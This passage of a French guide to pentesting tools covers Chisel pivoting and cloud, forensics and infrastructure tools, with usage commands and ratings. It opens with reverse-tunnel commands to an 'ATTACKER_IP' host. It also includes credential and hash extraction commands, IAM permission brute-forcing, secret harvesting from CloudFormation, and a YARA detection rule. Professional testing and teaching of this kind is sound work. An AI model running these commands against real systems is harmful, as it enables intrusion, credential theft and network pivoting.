chisel client ATTACKER_IP:8080 R:socks

# Sur la cible : port forwarding spécifique
chisel client ATTACKER_IP:8080 R:3389:10.10.10.5:3389

# Utiliser le proxy SOCKS avec proxychains
proxychains nmap -sT 10.10.10.0/24

Lien officiel : github.com/jpillora/chisel

Notre verdict : Chisel est l'outil de pivoting le plus pratique en 2026. Son binaire unique Go, sa simplicité d'utilisation et ses fonctionnalités de proxy SOCKS5 en font le choix numéro 1 pour le pivoting réseau. Combiné avec proxychains, Chisel permet d'utiliser n'importe quel outil à travers un réseau pivoté. Indispensable pour les pentests d'infrastructure avec segmentation réseau.

Tableau comparatif — Post-Exploitation

Outil	Licence	Langage	Difficulté	Cas d'usage principal	Note (/5)
Mimikatz	Open source (CC BY 4.0)	C	Avancé	Extraction de credentials Windows	⭐⭐⭐⭐⭐
LaZagne	Open source (LGPL)	Python	Débutant	Récupération mots de passe apps	⭐⭐⭐⭐
Responder	Open source (GPLv3)	Python	Intermédiaire	Empoisonnement LLMNR/NBT-NS	⭐⭐⭐⭐⭐
ntlmrelayx	Open source (Apache 2.0)	Python	Avancé	Relay NTLM	⭐⭐⭐⭐⭐
Evil-WinRM	Open source (LGPL)	Ruby	Débutant	Shell WinRM pentesting	⭐⭐⭐⭐⭐
Chisel	Open source (MIT)	Go	Intermédiaire	Pivoting réseau via HTTP	⭐⭐⭐⭐⭐

Phase 6 : Cloud — 6 outils essentiels

Avec la migration massive vers le cloud en 2026, le pentest cloud est devenu une compétence incontournable. AWS, Azure et GCP hébergent des données critiques et des workloads sensibles, ce qui en fait des cibles prioritaires. Les outils de cette section couvrent l'audit de sécurité multi-cloud, l'exploitation de permissions IAM et la découverte de misconfigurations. La sécurité cloud diffère fondamentalement de la sécurité on-premises : les erreurs de configuration IAM, les buckets publics et les permissions excessives sont les principaux vecteurs d'attaque.

37. ScoutSuite — Audit de sécurité multi-cloud

ScoutSuite de NCC Group est un outil d'audit de sécurité multi-cloud qui analyse les configurations AWS, Azure, GCP et OCI pour identifier les vulnérabilités et les violations de bonnes pratiques. Son rapport HTML interactif permet de visualiser les résultats par service et par niveau de risque. ScoutSuite est particulièrement apprécié pour sa couverture multi-cloud et la clarté de ses rapports, ce qui en fait un outil idéal pour les audits de sécurité cloud professionnels avec livrable client.

• AWS/Azure/GCP/OCI — Support des quatre principaux fournisseurs cloud
• Rapport HTML interactif — Dashboard navigable avec filtres par service et sévérité
• 200+ règles — Vérifications de sécurité couvrant IAM, stockage, réseau, compute et plus
• Profils d'audit — Personnalisation des règles selon les standards de conformité

# Installation
pip install scoutsuite

# Audit AWS
scout aws --profile my-profile

# Audit Azure
scout azure --cli

# Audit GCP
scout gcp --user-account

# Rapport dans scout-report/
# Ouvrir le fichier HTML pour la visualisation

Lien officiel : github.com/nccgroup/ScoutSuite

Notre verdict : ScoutSuite est notre outil de prédilection pour les audits de sécurité cloud multi-provider. Ses rapports HTML sont de qualité professionnelle et peuvent être directement intégrés dans les livrables d'audit. Sa couverture multi-cloud est un atout majeur pour les organisations utilisant plusieurs providers.

38. Prowler — Audit de sécurité AWS/Azure/GCP

Prowler est un outil d'audit de sécurité cloud spécialisé dans la conformité et les bonnes pratiques. Il vérifie les configurations AWS, Azure et GCP contre les benchmarks CIS, PCI-DSS, HIPAA, GDPR et d'autres frameworks de conformité. Prowler se distingue par ses capacités de reporting avancées (HTML, CSV, JSON, ASFF pour AWS Security Hub) et son dashboard intégré pour la visualisation des résultats. En 2026, Prowler est devenu l'outil open source de référence pour l'audit de conformité cloud.

• CIS Benchmarks — Vérification contre les benchmarks CIS pour AWS, Azure et GCP
• PCI-DSS/HIPAA — Contrôles de conformité pour les standards réglementaires
• Output multi-format — HTML, CSV, JSON, ASFF pour AWS Security Hub, OCSF
• Dashboard — Interface web pour la visualisation et le suivi des résultats

# Installation
pip install prowler

# Audit AWS avec rapport HTML
prowler aws --profile my-profile -M html

# Audit avec filtrage par sévérité
prowler aws --severity critical high

# Audit Azure
prowler azure --sp-env-auth

# Vérification CIS uniquement
prowler aws --compliance cis_2.0_aws

Lien officiel : github.com/prowler-cloud/prowler

Notre verdict : Prowler est l'outil de conformité cloud le plus complet en open source. Ses rapports sont détaillés et conformes aux standards de l'industrie. Idéal pour les audits de conformité PCI-DSS, HIPAA et CIS. Nous le combinons souvent avec ScoutSuite pour une couverture maximale.

39. CloudSploit — Scanner de sécurité cloud open source

CloudSploit d'Aqua Security est un scanner de sécurité cloud open source qui vérifie les configurations AWS, Azure, GCP et OCI pour identifier les risques de sécurité. Son architecture de plugins modulaires facilite l'extension avec des vérifications personnalisées. CloudSploit est intégré dans la plateforme Aqua Security pour les déploiements entreprise, mais la version open source reste parfaitement utilisable pour les audits ponctuels et l'intégration dans les pipelines CI/CD.

• AWS/Azure/GCP/OCI — Support multi-cloud avec plugins spécialisés par provider
• Plugins modulaires — Architecture extensible avec ajout facile de vérifications personnalisées
• API — Mode API pour l'intégration dans les systèmes d'automatisation
• Compliance mapping — Mapping des résultats vers les frameworks de conformité

# Installation
git clone https://github.com/aquasecurity/cloudsploit && cd cloudsploit
npm install

# Configuration
cp config_example.js config.js
# Éditer config.js avec vos credentials cloud

# Lancer le scan
node index.js --config config.js

# Scan avec filtre de résultats
node index.js --config config.js --compliance cis

Lien officiel : github.com/aquasecurity/cloudsploit

Notre verdict : CloudSploit est un bon scanner de sécurité cloud avec une architecture de plugins propre et extensible. Moins complet que Prowler pour la conformité et moins élégant que ScoutSuite pour les rapports, il reste utile comme outil complémentaire ou pour les organisations déjà dans l'écosystème Aqua Security.

40. Pacu — Framework d'exploitation AWS

Pacu de Rhino Security Labs est un framework d'exploitation spécialisé AWS, comparable à Metasploit mais pour le cloud. Ses 50+ modules couvrent l'énumération IAM, l'escalade de privilèges, la persistance, l'exfiltration de données et le mouvement latéral dans les environnements AWS. Pacu est l'outil offensif cloud le plus complet pour AWS et permet de simuler des scénarios d'attaque réalistes dans les environnements cloud modernes.

• 50+ modules d'attaque — Couverture extensive des techniques offensives AWS
• Énumération IAM — Découverte complète des permissions, rôles et politiques
• Escalade de privilèges — Identification et exploitation automatisée des chemins d'escalade IAM
• Persistance — Création de backdoors IAM, Lambda et autres mécanismes de persistance

# Installation
pip install pacu

# Lancer Pacu
pacu

# Configurer les credentials
Pacu > set_keys

# Énumération des permissions IAM
Pacu > run iam__enum_permissions

# Escalade de privilèges
Pacu > run iam__privesc_scan

# Énumération des buckets S3
Pacu > run s3__bucket_finder

Lien officiel : github.com/RhinoSecurityLabs/pacu

Notre verdict : Pacu est l'outil d'exploitation AWS le plus complet. Ses modules d'escalade de privilèges IAM sont particulièrement efficaces et révèlent souvent des chemins d'attaque que les outils d'audit passifs ne détectent pas. Indispensable pour les pentests AWS orientés exploitation.

41. enumerate-iam — Énumération des permissions IAM AWS

enumerate-iam est un outil spécialisé dans l'énumération des permissions IAM AWS par brute-force d'API. Lorsque vous disposez de credentials AWS (access key + secret key), enumerate-iam tente d'appeler toutes les API AWS disponibles pour déterminer les permissions exactes associées à ces credentials. Cette technique est plus précise que la lecture des politiques IAM car elle révèle les permissions effectives, incluant celles héritées via les groupes et les rôles.

• Brute-force API AWS — Test systématique de toutes les API pour découvrir les permissions
• Détection de permissions — Identification des permissions effectives (pas seulement déclarées)
• Rapide — Parallélisation des appels API pour des résultats en quelques minutes
• Output clair — Liste structurée des permissions découvertes

# Installation
pip install enumerate-iam

# Énumération des permissions
enumerate-iam --access-key AKIA... --secret-key ...

# Avec un token de session
enumerate-iam --access-key AKIA... --secret-key ... --session-token ...

# Avec région spécifique
enumerate-iam --access-key AKIA... --secret-key ... --region eu-west-1

Lien officiel : github.com/andresriancho/enumerate-iam

Notre verdict : enumerate-iam est un outil simple mais essentiel pour la phase initiale de tout pentest AWS. Savoir exactement quelles permissions vous avez est la première étape pour identifier les chemins d'escalade de privilèges. Rapide et fiable, nous l'utilisons systématiquement après l'obtention de credentials AWS.

42. cf_enum — Énumération CloudFormation

cf_enum est un outil d'énumération des stacks CloudFormation AWS qui permet d'extraire des secrets, des configurations sensibles et des misconfigurations depuis les templates et les outputs CloudFormation. Les stacks CloudFormation contiennent souvent des informations sensibles (credentials de base de données, clés API, tokens) qui sont exposées en clair dans les paramètres, les outputs ou les templates stockés. cf_enum automatise la découverte de ces expositions.

• Extraction de secrets — Identification des credentials et clés stockés en clair dans CloudFormation
• Analyse de stacks — Énumération complète de toutes les stacks et de leurs configurations
• Détection de misconfigurations — Identification des configurations dangereuses dans les templates
• Multi-région — Scan de toutes les régions AWS pour une couverture complète

# Installation
pip install cf-enum

# Énumération CloudFormation
cf_enum --profile my-profile --region eu-west-1

# Scan de toutes les régions
cf_enum --profile my-profile --all-regions

# Export des résultats
cf_enum --profile my-profile --output results.json

Lien officiel : github.com/carlospolop/cf_enum

Notre verdict : cf_enum est un outil de niche mais précieux pour les pentests AWS. Les stacks CloudFormation sont souvent négligées lors des audits, alors qu'elles contiennent fréquemment des informations sensibles. Un scan cf_enum rapide peut révéler des credentials critiques en quelques secondes.

Tableau comparatif — Cloud

Outil	Licence	Langage	Difficulté	Cas d'usage principal	Note (/5)
ScoutSuite	Open source (GPLv2)	Python	Débutant	Audit multi-cloud avec rapport	⭐⭐⭐⭐⭐
Prowler	Open source (Apache 2.0)	Python	Débutant	Conformité cloud	⭐⭐⭐⭐⭐
CloudSploit	Open source (GPLv3)	JavaScript	Intermédiaire	Scanner cloud modulaire	⭐⭐⭐⭐
Pacu	Open source (BSD)	Python	Avancé	Exploitation AWS	⭐⭐⭐⭐⭐
enumerate-iam	Open source (MIT)	Python	Débutant	Énumération permissions IAM	⭐⭐⭐⭐
cf_enum	Open source	Python	Intermédiaire	Secrets CloudFormation	⭐⭐⭐

Phase 7 : Forensics & Reverse Engineering — 5 outils essentiels

La forensique numérique et le reverse engineering sont des compétences essentielles pour les pentesteurs avancés, les analystes de malware et les équipes de réponse à incident. Les outils de cette section permettent d'analyser des captures mémoire, d'inspecter le trafic réseau, de désassembler des binaires et de détecter des malwares par signatures. Bien que ces outils soient principalement associés au Blue Team et à la DFIR (Digital Forensics & Incident Response), ils sont également précieux pour les pentesteurs qui développent des implants personnalisés ou qui doivent comprendre les mécanismes de détection pour les contourner.

43. Volatility 3 — Analyse de mémoire forensique

Volatility 3 est le framework d'analyse de mémoire forensique le plus utilisé au monde. Il permet d'analyser des dumps mémoire (RAM) de systèmes Windows, Linux et macOS pour extraire des informations forensiques : processus en cours, connexions réseau, modules chargés, registre Windows, credentials en mémoire et traces de malware. La version 3, réécrite en Python 3, offre une architecture de plugins modernisée et des performances améliorées par rapport à la version 2.

• Analyse RAM Windows/Linux/Mac — Support des principaux systèmes d'exploitation et de leurs versions
• Plugins extensibles — Architecture modulaire avec des dizaines de plugins d'analyse
• Timeline — Reconstruction chronologique des événements depuis la mémoire
• Extraction d'artefacts — DLLs, exécutables, registre, credentials et structures de données

# Installation
pip install volatility3

# Lister les processus
vol -f memory.dmp windows.pslist

# Afficher l'arborescence des processus
vol -f memory.dmp windows.pstree

# Lister les connexions réseau
vol -f memory.dmp windows.netscan

# Extraire les hashes depuis la mémoire
vol -f memory.dmp windows.hashdump

# Scanner pour du code injecté
vol -f memory.dmp windows.malfind

Lien officiel : github.com/volatilityfoundation/volatility3

Notre verdict : Volatility 3 est le standard incontesté de l'analyse forensique de mémoire. Que vous soyez DFIR, analyste de malware ou pentesteur cherchant à comprendre les artefacts laissés par vos outils, Volatility est indispensable. La migration vers la version 3 est recommandée pour bénéficier des derniers plugins et de la compatibilité avec les systèmes modernes.

44. Wireshark — Analyseur de protocoles réseau

Wireshark est l'analyseur de protocoles réseau le plus populaire au monde. Il permet de capturer et d'inspecter le trafic réseau en temps réel ou depuis des fichiers de capture (PCAP), avec le support de plus de 3000 protocoles. Pour le pentesteur, Wireshark est utile pour analyser le trafic réseau capturé pendant un audit, vérifier que les communications sont correctement chiffrées, détecter des fuites d'informations et comprendre les protocoles propriétaires. Son outil en ligne de commande tshark est particulièrement utile pour l'extraction automatisée de données depuis des captures réseau.

• Capture live — Capture en temps réel du trafic réseau avec filtres de capture BPF
• 3000+ protocoles — Décodage de la quasi-totalité des protocoles réseau existants
• Filtres d'affichage — Langage de filtrage puissant pour l'analyse ciblée du trafic
• Export — Extraction de fichiers, d'objets HTTP, de flux TCP et d'autres artefacts

# Installation
sudo apt install wireshark

# Capture avec tshark (CLI)
tshark -i eth0 -w capture.pcap

# Analyse d'un fichier de capture
tshark -r capture.pcap -Y "http.request" -T fields -e http.host -e http.request.uri

# Extraction de credentials HTTP
tshark -r capture.pcap -Y "http.request.method==POST" -T fields -e http.file_data

# Statistiques des protocoles
tshark -r capture.pcap -z io,phs

Lien officiel : wireshark.org

Notre verdict : Wireshark est un outil universel que tout professionnel de la sécurité doit maîtriser. Sa capacité à décoder pratiquement n'importe quel protocole réseau en fait un outil d'analyse indispensable. L'utilisation de tshark en ligne de commande est particulièrement efficace pour l'extraction automatisée de données forensiques.

45. Ghidra — Reverse engineering de la NSA

Ghidra est un outil de reverse engineering développé par la NSA (National Security Agency) et publié en open source en 2019. Ghidra offre un décompilateur de qualité professionnelle qui transforme le code machine en pseudo-code C lisible, facilitant considérablement l'analyse de binaires. Son support multi-architecture (x86, x64, ARM, MIPS, PowerPC, etc.) et ses capacités de scripting en Java et Python en font une alternative gratuite et puissante à IDA Pro pour l'analyse statique de binaires et de malwares.

• Décompilateur — Transformation du code machine en pseudo-code C lisible pour l'analyse
• Multi-architecture — Support de dizaines d'architectures processeur (x86, ARM, MIPS, etc.)
• Scripting Java/Python — Automatisation de l'analyse avec des scripts personnalisés
• Collaboration — Mode multi-utilisateurs pour l'analyse collaborative de binaires complexes

# Téléchargement depuis ghidra-sre.org
# Nécessite Java 17+

# Lancer Ghidra
./ghidraRun

# Workflow typique :
# 1. Créer un nouveau projet
# 2. Importer le binaire à analyser
# 3. Auto-analyse (analyse automatique des fonctions, strings, imports)
# 4. Utiliser le décompilateur pour lire le pseudo-code C
# 5. Naviguer via les cross-references (xrefs)

# Script Ghidra (headless mode)
./analyzeHeadless /path/to/project project_name -import binary.exe -postScript AnalyzeScript.java

Lien officiel : github.com/NationalSecurityAgency/ghidra

Notre verdict : Ghidra est devenu l'outil de reverse engineering de référence pour les analystes et chercheurs en sécurité. Son décompilateur rivalise avec celui d'IDA Pro, et sa gratuité en fait un choix évident pour les pentesteurs et les équipes avec un budget limité. Recommandé sans réserve pour l'analyse de malware et le reverse engineering.

46. IDA Free — Désassembleur interactif

IDA Free de Hex-Rays est la version gratuite du désassembleur interactif le plus célèbre du monde. IDA (Interactive DisAssembler) est le standard de l'industrie pour l'analyse statique de binaires depuis plus de 20 ans. La version Free offre le support des architectures x86/x64 avec une interface graphique complète, des graphes de contrôle de flux et un système de plugins. Bien que limitée par rapport à la version Pro (pas de décompilateur, moins d'architectures), IDA Free reste un outil précieux pour l'analyse statique de base.

• Analyse statique — Désassemblage intelligent avec reconnaissance automatique des fonctions
• Graphe de contrôle de flux — Visualisation graphique du flux d'exécution des fonctions
• Plugins — Écosystème riche de plugins communautaires pour étendre les fonctionnalités
• Support multi-format — PE, ELF, Mach-O et autres formats de fichiers exécutables

# Téléchargement depuis hex-rays.com/ida-free
# Installation GUI standard

# Workflow typique :
# 1. Charger le binaire (PE, ELF, etc.)
# 2. Attendre l'analyse automatique
# 3. Naviguer en vue graphe ou vue texte
# 4. Suivre les cross-references (xrefs)
# 5. Renommer les fonctions et variables pour la clarté
# 6. Ajouter des commentaires pour documenter l'analyse

Lien officiel : hex-rays.com/ida-free

Notre verdict : IDA Free est un bon outil de désassemblage pour les analyses basiques en x86/x64. Cependant, l'absence de décompilateur dans la version gratuite est un handicap majeur par rapport à Ghidra. Nous recommandons Ghidra comme premier choix pour le reverse engineering en 2026, sauf si vous avez accès à IDA Pro avec le décompilateur Hex-Rays.

47. YARA — Classification de malware par patterns

YARA est un outil de classification et d'identification de malware par patterns (règles). Développé par VirusTotal, YARA permet de créer des règles de détection basées sur des chaînes de caractères, des expressions régulières, des conditions logiques et des caractéristiques de fichiers. Les règles YARA sont largement utilisées par les antivirus, les EDR et les plateformes d'analyse de malware pour identifier les familles de malware connues. Pour le pentesteur, YARA est utile pour scanner les systèmes à la recherche d'indicateurs de compromission (IOC) et pour tester la détection de ses propres implants.

• Règles de pattern matching — Langage de règles expressif pour la détection de motifs dans les fichiers
• Intégration VirusTotal — Compatibilité native avec la plateforme VirusTotal pour le hunting de malware
• Scan récursif — Analyse de répertoires complets avec support des archives
• Python binding — Bibliothèque Python pour l'intégration dans les scripts d'automatisation

# Installation
sudo apt install yara
# Ou pour l'utilisation en Python
pip install yara-python

# Scan avec un fichier de règles
yara -r rules.yar /path/to/scan/

# Scan avec métadonnées
yara -r -m rules.yar /path/to/scan/

# Exemple de règle YARA
# rule detect_mimikatz {
#     strings:
#         $s1 = "mimikatz" nocase
#         $s2 = "sekurlsa" nocase
#         $s3 = "gentilkiwi"
#     condition:
#         2 of ($s*)
# }

Lien officiel : github.com/VirusTotal/yara

Notre verdict : YARA est un outil fondamental de l'analyse de malware et de la threat intelligence. Pour les pentesteurs, il est utile pour tester la détection de vos implants et pour scanner les systèmes compromis à la recherche de malware. La maîtrise de l'écriture de règles YARA est une compétence valorisée en cybersécurité.

Tableau comparatif — Forensics & Reverse Engineering

Outil	Licence	Langage	Difficulté	Cas d'usage principal	Note (/5)
Volatility 3	Open source (VSL)	Python	Avancé	Analyse forensique de mémoire	⭐⭐⭐⭐⭐
Wireshark	Open source (GPLv2)	C	Intermédiaire	Analyse de protocoles réseau	⭐⭐⭐⭐⭐
Ghidra	Open source (Apache 2.0)	Java	Avancé	Reverse engineering de binaires	⭐⭐⭐⭐⭐
IDA Free	Freeware	C++	Avancé	Désassemblage statique	⭐⭐⭐⭐
YARA	Open source (BSD)	C	Intermédiaire	Classification de malware	⭐⭐⭐⭐⭐

Phase 8 : Infrastructure — 3 outils essentiels

Le scanning d'infrastructure est la base de tout test d'intrusion d'envergure. Les scanners de vulnérabilités d'infrastructure identifient les failles de sécurité sur les serveurs, les équipements réseau, les applications et les services exposés. Contrairement aux outils de reconnaissance qui se concentrent sur la découverte, les scanners d'infrastructure analysent en profondeur chaque service pour identifier les vulnérabilités connues (CVE), les configurations incorrectes et les logiciels obsolètes. Ces outils produisent des rapports détaillés qui constituent souvent la base du livrable d'audit pour les clients.

48. Nessus — Scanner de vulnérabilités leader

Nessus de Tenable est le scanner de vulnérabilités d'infrastructure le plus utilisé dans le monde professionnel. Avec plus de 80000 plugins de détection, Nessus couvre un spectre extrêmement large de vulnérabilités : systèmes d'exploitation, applications, équipements réseau, bases de données et configurations de sécurité. Son interface web intuitive, ses templates de scan pré-configurés et ses rapports détaillés en font un outil de productivité incontournable pour les audits d'infrastructure. La version Nessus Professional est la plus utilisée par les consultants en cybersécurité, tandis que Nessus Expert ajoute des fonctionnalités cloud et IaC scanning.

• 80000+ plugins — Bibliothèque massive de détection couvrant tous les types de vulnérabilités
• Conformité — Vérifications de conformité CIS, PCI-DSS, HIPAA et autres standards
• Rapports détaillés — Rapports professionnels avec scores CVSS, descriptions et remédiations
• API — REST API pour l'automatisation et l'intégration avec les systèmes de ticketing

# Installation : téléchargement du .deb/.rpm depuis tenable.com
sudo dpkg -i Nessus-*.deb
sudo systemctl start nessusd

# Accès à l'interface web
# https://localhost:8834

# Workflow :
# 1. New Scan → Basic Network Scan
# 2. Configurer les cibles (IPs, ranges)
# 3. Configurer les credentials (SSH, SMB, etc.)
# 4. Lancer le scan
# 5. Analyser les résultats par sévérité
# 6. Exporter le rapport (PDF, HTML, CSV)

Lien officiel : tenable.com/products/nessus

Notre verdict : Nessus Professional reste le scanner de vulnérabilités d'infrastructure de référence en 2026. Sa base de plugins est la plus complète de l'industrie, et ses rapports sont de qualité professionnelle. L'investissement dans la licence (~3500 USD/an) est justifié pour les consultants qui réalisent régulièrement des audits d'infrastructure. Pour un usage ponctuel, considérez OpenVAS comme alternative gratuite.

49. OpenVAS (Greenbone) — Scanner de vulnérabilités open source

OpenVAS (Open Vulnerability Assessment Scanner), maintenu par Greenbone Networks, est le scanner de vulnérabilités open source le plus complet. Avec plus de 50000 NVT (Network Vulnerability Tests), OpenVAS offre une couverture de détection impressionnante pour un outil gratuit. Son interface web Greenbone Security Assistant (GSA) et son API GMP (Greenbone Management Protocol) permettent une gestion complète des scans et des rapports. OpenVAS est une excellente alternative à Nessus pour les organisations avec un budget limité ou celles qui préfèrent les solutions open source.

• 50000+ NVT — Base de tests de vulnérabilités alimentée par Greenbone et la communauté
• Interface web Greenbone — Dashboard web pour la gestion des scans, des cibles et des rapports
• API GMP — Protocole de gestion pour l'automatisation et l'intégration
• Gratuit — Aucune licence commerciale requise pour le scanner communautaire

# Installation
sudo apt install gvm && gvm-setup

# Configuration initiale
sudo gvm-setup
# Noter le mot de passe admin généré

# Démarrage des services
sudo gvm-start

# Accès à l'interface web
# https://localhost:9392

# Utilisation en CLI avec gvm-cli
gvm-cli socket --xml ''

Lien officiel : github.com/greenbone

Notre verdict : OpenVAS/Greenbone est le meilleur scanner de vulnérabilités open source disponible en 2026. Bien que ses performances et sa base de plugins soient inférieures à celles de Nessus, il offre un excellent rapport qualité/prix (gratuit !) pour les audits d'infrastructure. Son installation peut être complexe, mais une fois configuré, OpenVAS est un outil fiable et productif. Idéal pour les pentesteurs indépendants et les petites structures.

50. Nikto — Scanner de serveurs web

Nikto est un scanner de serveurs web open source qui vérifie plus de 7000 fichiers et programmes potentiellement dangereux, teste les versions obsolètes de plus de 1250 serveurs web et identifie les problèmes de configuration de sécurité. Bien que moins sophistiqué que Nuclei ou Burp Suite, Nikto reste un outil utile pour un scan rapide de la surface d'attaque d'un serveur web : headers de sécurité manquants, fichiers par défaut exposés, logiciels obsolètes et configurations SSL/TLS problématiques.

• 7000+ tests — Vérification de fichiers dangereux, configurations incorrectes et vulnérabilités connues
• Détection de logiciels obsolètes — Identification des versions de serveurs web et de frameworks avec CVE connues
• Headers de sécurité — Vérification des headers HTTP de sécurité (CSP, HSTS, X-Frame-Options, etc.)
• SSL/TLS check — Analyse de la configuration SSL/TLS et des certificats

# Installation
sudo apt install nikto

# Scan basique
nikto -h https://target.com

# Scan avec rapport HTML
nikto -h https://target.com -o report.html -Format htm

# Scan avec plugins spécifiques
nikto -h https://target.com -Plugins "apache;headers"

# Scan de plusieurs hôtes
nikto -h hosts.txt

Lien officiel : github.com/sullo/nikto

Notre verdict : Nikto est un scanner web simple et rapide qui complémente bien les outils plus avancés comme Nuclei et Burp Suite. Son scan de headers de sécurité et de fichiers par défaut fournit souvent des résultats rapides et utiles en début d'audit. Moins puissant que les alternatives modernes, il reste pertinent pour les scans de surface rapides.

Tableau comparatif — Infrastructure

Outil	Licence	Langage	Difficulté	Cas d'usage principal	Note (/5)
Nessus	Commerciale	C/C++	Débutant	Scanning de vulnérabilités complet	⭐⭐⭐⭐⭐
OpenVAS	Open source (GPLv2)	C	Intermédiaire	Scanning open source	⭐⭐⭐⭐
Nikto	Open source (GPLv1)	Perl	Débutant	Scan rapide serveurs web	⭐⭐⭐

Questions fréquentes (FAQ)

Conclusion

Ce guide a présenté les 50 outils essentiels du pentester en 2026, couvrant l'ensemble des phases d'un test d'intrusion professionnel. De la reconnaissance passive avec Subfinder et Shodan à l'analyse forensique avec Volatility, en passant par l'exploitation Active Directory avec BloodHound et Impacket, chaque outil a été choisi pour sa pertinence opérationnelle, sa maturité et sa valeur ajoutée dans un contexte d'audit réel. L'écosystème du pentest continue d'évoluer rapidement, avec l'émergence de nouveaux outils et l'amélioration constante des solutions existantes.

Plusieurs tendances marquent l'année 2026 dans le domaine de l'outillage offensif. Premièrement, la suite ProjectDiscovery (subfinder, httpx, nuclei) s'est imposée comme le standard pour la reconnaissance et le scanning web automatisés. Deuxièmement, les frameworks C2 open source (Sliver, Mythic, Havoc) rivalisent désormais avec les solutions commerciales, démocratisant l'accès à des capacités offensives avancées. Troisièmement, la sécurité cloud est devenue un domaine de pentest à part entière, avec des outils spécialisés comme Pacu et ScoutSuite. Enfin, les attaques AD CS (certificats) sont devenues un vecteur d'escalade de privilèges incontournable, rendant Certipy et ADCSKiller essentiels dans la boîte à outils AD.

Pour aller plus loin, nous vous recommandons de consulter nos guides spécialisés : le guide complet du pentest Active Directory, notre comparatif des frameworks C2 en 2026, et notre article sur la sécurité des API avec Burp et Nuclei. Retrouvez également nos outils et configurations sur notre page GitHub Ayinedjimi.